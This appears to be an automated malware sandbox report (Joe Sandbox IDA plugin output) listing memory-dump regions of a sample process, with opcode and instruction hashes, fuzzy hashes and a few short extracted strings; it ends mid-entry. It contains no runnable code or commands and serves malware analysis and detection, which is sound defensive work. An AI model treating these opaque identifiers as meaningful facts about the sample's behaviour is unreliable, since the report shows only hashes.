                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dcafcf6d21026018d67decdf51e841de72584bd726326028d17a3f43b86b063e
                                • Instruction ID: fa79c48cd79049999952a170f9afd53495a0f63b57f862e3a91e8c52988b66ac
                                • Opcode Fuzzy Hash: dcafcf6d21026018d67decdf51e841de72584bd726326028d17a3f43b86b063e
                                • Instruction Fuzzy Hash: 9E410971F1A51E8EEB64EB94D864AEDBBB1FF58300F410139E009E72A5DA34AE448B50
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 728854fa498ee7908f445aa1ae50d94e483e8a09c3d8c6a9f0780902a2ae454d
                                • Instruction ID: 595bc15d91271002c55ece202230a286b36b932c0cc38cacb6e7786f38e65261
                                • Opcode Fuzzy Hash: 728854fa498ee7908f445aa1ae50d94e483e8a09c3d8c6a9f0780902a2ae454d
                                • Instruction Fuzzy Hash: 4B316630A1E78D8FDB55DFA4C8685A93FF0FF19300F4545B6E418C61A6DA38E654CB41
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1624440abb98620990175e47000602e47c593058ca89c934bebeaa1c8bbb5038
                                • Instruction ID: 1272c314b5f960050f16abcf4fedbb808a52219b3aef79a779cef264eea57746
                                • Opcode Fuzzy Hash: 1624440abb98620990175e47000602e47c593058ca89c934bebeaa1c8bbb5038
                                • Instruction Fuzzy Hash: 3B31C431B2A50E8FE751EF78C8585B97BE0FF5C700F4245B6D419D60B6EE34AA448740
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a6f792049f614c562e469264ff932d0a060dcbca037cdb58c66d14cbb3cc2bbc
                                • Instruction ID: 31003e2daaba34f43668c49514546333b239f67f2a6f7683e6ccb197bcfa9703
                                • Opcode Fuzzy Hash: a6f792049f614c562e469264ff932d0a060dcbca037cdb58c66d14cbb3cc2bbc
                                • Instruction Fuzzy Hash: E6419D34E1925E8FEB69DBA4C8642ED7BB1FF06304F01017AE449D72A1DB786A84CB40
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0bc9343b5431ec83e7448f72a86b462a6e0820b3b7b63e3b8c01d7e11a8c981
                                • Instruction ID: 5a4aa9a228d722a4d8b38207de291c74bffee04aaa17c2243f5b07e4b15bd822
                                • Opcode Fuzzy Hash: b0bc9343b5431ec83e7448f72a86b462a6e0820b3b7b63e3b8c01d7e11a8c981
                                • Instruction Fuzzy Hash: F5315030A1A64ECFDB55EFA4C4686B97BE0FF19301F4104BAE419C61A5DE38AA54CB50
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b29c2e241813e15bc53e53f3b47adee2e534ce55a005df8aa4ec8c645a8f51d4
                                • Instruction ID: 0bc76ba0a48876ec7225c4736831ba73cd5acc6b8f60f7fa2b25bc68db166176
                                • Opcode Fuzzy Hash: b29c2e241813e15bc53e53f3b47adee2e534ce55a005df8aa4ec8c645a8f51d4
                                • Instruction Fuzzy Hash: 9621B621F2F68E4FE7619F7488291F97FA0FF59600F4605B6D458D60E3EE29AA048781
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c6208619bcde4f3462698d75dfaa0a9445698eea7625e89a6d88a733ada5030
                                • Instruction ID: 34b304afdb366ac68e13f191b9409e2be24a8549b7b6c16b69fe48635300ec42
                                • Opcode Fuzzy Hash: 1c6208619bcde4f3462698d75dfaa0a9445698eea7625e89a6d88a733ada5030
                                • Instruction Fuzzy Hash: 7121F471F0951D8FEB64EB98D4A4AECBBF1FF98301F51017AD009E72A5DA386A40CB50
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 912987e38a175659fa3a1ffeaecd4cbe513917a41c1e098c53f6e2766915a966
                                • Instruction ID: b8f56989fe302edc70ce4757d861bca92ed3419d8d6cdf24ab7423c614e22789
                                • Opcode Fuzzy Hash: 912987e38a175659fa3a1ffeaecd4cbe513917a41c1e098c53f6e2766915a966
                                • Instruction Fuzzy Hash: 49218630A1E68E8FD755EFB488696B93FA0FF0A310F4545BAE418C60E2DB385A45C741
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d831ef64adeafcb30de6f72ecff24d1f80a7879b692151bd9ed12cdd35f40b13
                                • Instruction ID: 0144828ad04ec052db809869fcdbe81b0a91e16938b001834b1cbd7922b88801
                                • Opcode Fuzzy Hash: d831ef64adeafcb30de6f72ecff24d1f80a7879b692151bd9ed12cdd35f40b13
                                • Instruction Fuzzy Hash: 12119E01A0F2C65AEB236BB948344616FA08F07224B1E46FFE0D88A0F3D90C5E4AC342
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d45c29ec7f04a83d78c879ceaee763e5ab2bed99a2c0e20cc834c84a080ad4c
                                • Instruction ID: eea2459422ece5a17453989e16290826e3ca39066e39787ca59f6bca96c95258
                                • Opcode Fuzzy Hash: 5d45c29ec7f04a83d78c879ceaee763e5ab2bed99a2c0e20cc834c84a080ad4c
                                • Instruction Fuzzy Hash: 12116A30A1E78DCFDB659FA488646B93FA0FF19300F4504BAE419C61E6DB78DA54CB41
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b69ba6e20d85eceea08ea103796b8b9856da7cdd3731501dae229c8cfc428159
                                • Instruction ID: 4b104b27ac234f18b6681b8a616fc50ff03242152ba31115b1a522d0dda6177e
                                • Opcode Fuzzy Hash: b69ba6e20d85eceea08ea103796b8b9856da7cdd3731501dae229c8cfc428159
                                • Instruction Fuzzy Hash: 63014F30B0950E8FDB98FF65C0646B97BE1FF5C305F51447ED40AC62A4CA36AA51CB80
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 27a1c9e52232fdfbc0290f60a9ca9590e80c120d2b6f9e806fbf2f0b3d7e128c
                                • Instruction ID: 24c03f60884a7cce6e63a663edad907a0ec1e0aa9fe31cdc81733eae6237f5ed
                                • Opcode Fuzzy Hash: 27a1c9e52232fdfbc0290f60a9ca9590e80c120d2b6f9e806fbf2f0b3d7e128c
                                • Instruction Fuzzy Hash: 5001A221F2A54E4EEBA0AFA888291FD7BA0FF48700F41057AD41CD60E2EE346E048780
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b54da5bb67be6a0331294714df3641a584107c5bb6c3610c5a1ab8ad898dcdf
                                • Instruction ID: 3e3f85755e881e019ae16f154937280db452c0ddb02bb78d9e61005f87be7c0c
                                • Opcode Fuzzy Hash: 2b54da5bb67be6a0331294714df3641a584107c5bb6c3610c5a1ab8ad898dcdf
                                • Instruction Fuzzy Hash: E4016230B1950E8BDB58EFA4C4695B97BA1FF18305FA1047EE41EC61E6DF35AA50C640
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9edf74d8e9bbe3bd9d1201b4cd9af606b8c644fdadb6fb993d20f5c87f09d443
                                • Instruction ID: 5457151a9d4851994e78b7d59d6de795c671fd554b619d9f77a389bbc5dea185
                                • Opcode Fuzzy Hash: 9edf74d8e9bbe3bd9d1201b4cd9af606b8c644fdadb6fb993d20f5c87f09d443
                                • Instruction Fuzzy Hash: F8F06230A2551E9EEB58EFA8C4686BA7BE1FF19309F11047EE41AC21A1DE316680C700
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b1620c43da95d1e06784a62530e18a03f5252a4ead24c6182c6583ecaa8dbf4
                                • Instruction ID: 36101be1d71c997cebd67ee2c45070dd77c4b12abbec15c1db99c1bdd2100815
                                • Opcode Fuzzy Hash: 0b1620c43da95d1e06784a62530e18a03f5252a4ead24c6182c6583ecaa8dbf4
                                • Instruction Fuzzy Hash: 9D012170F0A51E8EDF64EF90C495AFDBBB1EF58301F51457AD409A2295CE38AA84DBC0
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 488043351cc7216ce70ca6478bf05b0e5f500d0cacf8e2273c738f241169c19c
                                • Instruction ID: c90da7f2dd729c1b5a6db05c1ddfb3346afc162a582ecd74b88e5ab73dc5bee7
                                • Opcode Fuzzy Hash: 488043351cc7216ce70ca6478bf05b0e5f500d0cacf8e2273c738f241169c19c
                                • Instruction Fuzzy Hash: 56F02670F1691D9EEBA5EF6888556E9BAB1FF5C300F9105F5A40DD22A1DF341E80CB50
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37ec873e2dc0066a3a29eaf89bb8a1798f947ff68f63e93ce4f5bdbaf1ccb445
                                • Instruction ID: 4fa1ae4391ad370b8a118c06bf72015deb1b784b446c6788a2a3e693bd1790ac
                                • Opcode Fuzzy Hash: 37ec873e2dc0066a3a29eaf89bb8a1798f947ff68f63e93ce4f5bdbaf1ccb445
                                • Instruction Fuzzy Hash: 93F06C30B1A64ECAEF69AFA484242BA3694FF08305F810879F41DC11D5DF386654CA81
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 316d9b8e7bbc6da8f413643cf67c82e994ff4f085359703a2c6cf42c3869ee0b
                                • Instruction ID: 9f6f3d3eaf19f9f204da73afb51f32c27c8c788be055869bab94fafcd8e10b9f
                                • Opcode Fuzzy Hash: 316d9b8e7bbc6da8f413643cf67c82e994ff4f085359703a2c6cf42c3869ee0b
                                • Instruction Fuzzy Hash: 44F0DA30B1A50D8FEB24EB54CC54BEDB7B1FB58701F5142A5D00AE3295DE786E818F80
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e923426db90b489bb3e4055a9089f803b057fd8c153bee60f99321c842b6262
                                • Instruction ID: 77d16f63e4180b92c1ca0f69138e12343a23da6b917f9b4f367cd5ebb8d21bd0
                                • Opcode Fuzzy Hash: 7e923426db90b489bb3e4055a9089f803b057fd8c153bee60f99321c842b6262
                                • Instruction Fuzzy Hash: F8E06521F0740A46EA749FDC84A563469D19B88304FFA8274F02CC61F2E92DEDC6C240
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: )L_^$*L_^
                                • API String ID: 0-1724811391
                                • Opcode ID: d051ccffe35f66e5d76023db40e2baf7b1b5f5243ad5015343d90bb7ff637541
                                • Instruction ID: ffa649c16358faaac8ba8ea3cc748f99762904e448a737b08e00072c2e3dd7cc
                                • Opcode Fuzzy Hash: d051ccffe35f66e5d76023db40e2baf7b1b5f5243ad5015343d90bb7ff637541
                                • Instruction Fuzzy Hash: FAB1D822B0E6A65BDB11AB78AC794E57FB0EF0371871902F7E0998B0E3DD186549C345
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: K_H$S,L_^
                                • API String ID: 0-2660599901
                                • Opcode ID: cbbebb0328288665ff10945f801c3709870cec13b3a6ca7d88823dc4112df5ed
                                • Instruction ID: c91631c74d31ded53613e8365b33807d94ba1025f2d5178279eb6bd938dcb667
                                • Opcode Fuzzy Hash: cbbebb0328288665ff10945f801c3709870cec13b3a6ca7d88823dc4112df5ed
                                • Instruction Fuzzy Hash: 4D318475B1990EAFDB54EB98D4A16A8B3E2FF98310B51423AE05DD3691CF34BC12C780
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: sL_I
                                • API String ID: 0-325917797
                                • Opcode ID: 51d24e74a85ae35d70589a5c95ea083ea0dc467b16de222a99e686cd6a09d315
                                • Instruction ID: 0eab2b59673b2cbd3c3865ef49fb3bdf6ba06624d7b69473780934180009f9c4
                                • Opcode Fuzzy Hash: 51d24e74a85ae35d70589a5c95ea083ea0dc467b16de222a99e686cd6a09d315
                                • Instruction Fuzzy Hash: 94A10313F1E68A4AE77557AC28351B82F90EF89254B5A41BBE24EC71FBEC097D0243D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: #@
                                • API String ID: 0-742695533
                                • Opcode ID: d101563fe18a6cda981f37df99c08ac288995da2837702eacf3f4b8daf55f71f
                                • Instruction ID: 3edffd9487e09e5f9f1d8d71932ae39876624adf8fa1b1b645d93c75d5643c4c
                                • Opcode Fuzzy Hash: d101563fe18a6cda981f37df99c08ac288995da2837702eacf3f4b8daf55f71f
                                • Instruction Fuzzy Hash: 27C1F2746296498FDB69DF58C4A17B437A1FF48300F5641BDD88ACB39BCA38E981CB40
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 64cc6ccb08d87d30dd06e488ff14f5fa4188b7372ba10beb521a587e93aa7334
                                • Instruction ID: 427b9d265719cd307821686650bc162e244337d1a681af8f491693d84d4789b9
                                • Opcode Fuzzy Hash: 64cc6ccb08d87d30dd06e488ff14f5fa4188b7372ba10beb521a587e93aa7334
                                • Instruction Fuzzy Hash: 9D516B35E1961EAFDB59DB98D4A06FCB7B1EF54300F1141BED05AE73A6CA342A01CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 2c8541dac7c0e81b36cb80116604c64e2936da1de9e6b4f179fae717aa30f5a9
                                • Instruction ID: 5296be177cc5d3cf613e3a85a9b11e8486bd485625b515b1411f6a910124fe4d
                                • Opcode Fuzzy Hash: 2c8541dac7c0e81b36cb80116604c64e2936da1de9e6b4f179fae717aa30f5a9
                                • Instruction Fuzzy Hash: 99517D71F0964E8FDB69DB98D4615BDBBB1EF4C301F1140BAD019E76A6DA342D01CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: {z}
                                • API String ID: 0-1552007774
                                • Opcode ID: 59856674b51b3c8bf12f48eeddd4511347748c35d23f1be3fc0b1d512d148f29
                                • Instruction ID: 50f092dbbcc4a02077d13ce58d7dd727a16613ec3fb6c62489ac51bfda4e2bab
                                • Opcode Fuzzy Hash: 59856674b51b3c8bf12f48eeddd4511347748c35d23f1be3fc0b1d512d148f29
                                • Instruction Fuzzy Hash: 43411426B1F68E5FE77646B858740A83FA1DF4A350B0B02BBD0D9CB1B3D9081E46C352
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: S3
                                • API String ID: 0-3396860701
                                • Opcode ID: 87e6bb2b8f0ecebde7c4cce2814342d7b2cdd2e6755003e731064d25693af0d6
                                • Instruction ID: b16f0167677a1fce8be8c70c9bddebb6c8059849d7b31723c200472cc4d305d8
                                • Opcode Fuzzy Hash: 87e6bb2b8f0ecebde7c4cce2814342d7b2cdd2e6755003e731064d25693af0d6
                                • Instruction Fuzzy Hash: 2911C415A2F2DEAFD72747A448714B93F70AF43A00B1B01F7D0CACB0B3D9082A099366
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: c
                                • API String ID: 0-112844655
                                • Opcode ID: a3925d73cb67aa4e70ff48a9a5252a0e3bc3e4386821ed5d3018ad48ff7b33d3
                                • Instruction ID: adaf7e51f6b33d04fe4b169ff67c83ac43cf3af24657fee6ac01019908046548
                                • Opcode Fuzzy Hash: a3925d73cb67aa4e70ff48a9a5252a0e3bc3e4386821ed5d3018ad48ff7b33d3
                                • Instruction Fuzzy Hash: 69112B30707B458BD3B48B64D5A1662BBB1FF09310F90087CC08687992CB39F881C780
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: S3
                                • API String ID: 0-3396860701
                                • Opcode ID: fc33248c90badba3ce75787c46f186d07e0a654bd5d923c6502feafe7d7c8898
                                • Instruction ID: cc6a8bc4a0adecfef07e263a06a75f7c8aba3bd7681078a4c1f9acf07b082585
                                • Opcode Fuzzy Hash: fc33248c90badba3ce75787c46f186d07e0a654bd5d923c6502feafe7d7c8898
                                • Instruction Fuzzy Hash: 91F01C55E2F3CB5FE72713B549340642F609F57A00B8A05F6C0C9CA1F3D80D2A499356
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ad5227245c683c9c47941be8cd4bacef8bec78bff558a9cfacc079e81755223
                                • Instruction ID: e0662523ef9bc743452b24a085232351f47cc9cb126332b16dfe2d83a91df565
                                • Opcode Fuzzy Hash: 1ad5227245c683c9c47941be8cd4bacef8bec78bff558a9cfacc079e81755223
                                • Instruction Fuzzy Hash: F242B774E1991D9FDBA5EB58C869BE8B7B1FF58300F5141E9904DE32A1DE346A80CF40
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0101239af4bd37a63603e5a233573597b783b762a23283af07440c40c09c748c
                                • Instruction ID: 8c00028a93972a8702720ae9c1a8f74b0cc03635dd37a22206010f7dce869394
                                • Opcode Fuzzy Hash: 0101239af4bd37a63603e5a233573597b783b762a23283af07440c40c09c748c
                                • Instruction Fuzzy Hash: 30C1A234718A1D8FDB98DB58C899AB9B3E2FF58314B5141A9D04EC72A6DE31FC42CB40
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17d70ffb43a5ae4df2257565c358ee8496bf25b08e95961e1adea71429a7c73e
                                • Instruction ID: c884948384220c5bc13592ea1231e030fdb0c126b359b3e56a459181ab3665e2
                                • Opcode Fuzzy Hash: 17d70ffb43a5ae4df2257565c358ee8496bf25b08e95961e1adea71429a7c73e
                                • Instruction Fuzzy Hash: 25A13939B2D54D5FE768DB58C8655F937E0FF44320F06027AD49EC31B2DA28A90687C1
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 51edfb7ed7d12946233e6d56b2cea9bdf0a427368f732b7a9b4ac95dd29ce63c
                                • Instruction ID: 19f6e1d9526cb31a1ce52d401846177ef1b81445a7f1703ee36a95a552833114
                                • Opcode Fuzzy Hash: 51edfb7ed7d12946233e6d56b2cea9bdf0a427368f732b7a9b4ac95dd29ce63c
                                • Instruction Fuzzy Hash: 71B12734A2EA0BAFE368CB68D0A157077A1FF45304B61457DC08EC76A2DB39F952C780
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6468ee84ca45fe7c15ab8bd0d2977733492e07f11af98c76a367a303f00bc887
                                • Instruction ID: 2fa4efd68130fdc8664b4b69469bcd0c19b1350cd5978ca712942cca0dd72796
                                • Opcode Fuzzy Hash: 6468ee84ca45fe7c15ab8bd0d2977733492e07f11af98c76a367a303f00bc887
                                • Instruction Fuzzy Hash: BC21251AF2F29BA6F63567E928721BC77509F41361F5A01B7C4CD860E29C0C3A8243A2
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
